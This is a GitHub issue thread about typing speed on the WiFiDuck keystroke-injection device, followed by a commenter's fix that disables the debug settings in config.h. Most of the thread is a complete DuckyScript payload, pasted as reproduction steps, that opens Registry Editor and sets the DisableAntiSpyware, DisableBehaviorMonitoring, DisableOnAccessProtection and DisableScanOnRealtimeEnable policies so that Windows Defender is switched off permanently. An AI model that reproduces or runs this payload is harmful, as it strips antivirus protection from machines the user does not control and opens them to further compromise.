### ISSUE TITLE
your keyboard is so fast

### ISSUE THREAD

**Issue by abrar1485** [SpacehuhnTech/WiFiDuck#106]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Describe your problem

the typing is so fast so it does not handle a script properly

### Steps to reproduce

REM Title: Disable Windows Defender Permanently
REM Description: Disables windows defender permanently through Registry Editor, computer has to restart for changes to take effect
REM Author: https://github.com/HokkaidoInu
REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer
DELAY 1500
GUI r
DELAY 1500
STRING regedit
DELAY 1500
ENTER
DELAY 1500
LEFT
DELAY 1500
ENTER
DELAY 1500
TAB
DELAY 1500
TAB
DELAY 1500
STRING HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING n
DELAY 1500
STRING d
DELAY 1500
STRING DisableAntiSpyware
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING m
DELAY 1500
STRING 1
DELAY 1500
ENTER
DELAY 1500
TAB
DELAY 1500
TAB
DELAY 1500
APP
DELAY 1500
STRING n
DELAY 1500
STRING k
DELAY 1500
STRING Real-Time Protection
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING n
DELAY 1500
STRING d
DELAY 1500
STRING DisableBehaviorMonitoring
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING m
DELAY 1500
STRING 1
DELAY 1500
ENTER
DELAY 1500
TAB
DELAY 1500
TAB
DELAY 1500
APP
DELAY 1500
STRING n
DELAY 1500
STRING d
DELAY 1500
STRING DisableOnAccessProtection
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING m
DELAY 1500
STRING 1
DELAY 1500
ENTER
DELAY 1500
TAB
DELAY 1500
TAB
DELAY 1500
APP
DELAY 1500
STRING n
DELAY 1500
STRING d
DELAY 1500
STRING DisableScanOnRealtimeEnable
DELAY 1500
ENTER
DELAY 1500
APP
DELAY 1500
STRING m
DELAY 1500
STRING 1
DELAY 1500
ENTER
DELAY 1500
ALT F X
CAPSLOCK

### What hardware are you using?

diy node mcu aurdino pro micro

### Anything else?

some software updates can help

**Comment by Z3R0NULL** [comment]
You got the solution? same problem but is so slow.. i use the scripts with no delay because so slow typing


EDIT: I Found the solution  because in folder atmega_duck in the file config.h...
/*! DEBUG Settings */
 #define ENABLE_DEBUG
 #define DEBUG_PORT Serial
 #define DEBUG_BAUD 115200
 
 so i just commented this lines for no debug so my file looks like this
 
 /*! DEBUG Settings */
// #define ENABLE_DEBUG
// #define DEBUG_PORT Serial
// #define DEBUG_BAUD 115200

and its working fine :D.. idk but debug mode makes slow typing slow execution of scrips.
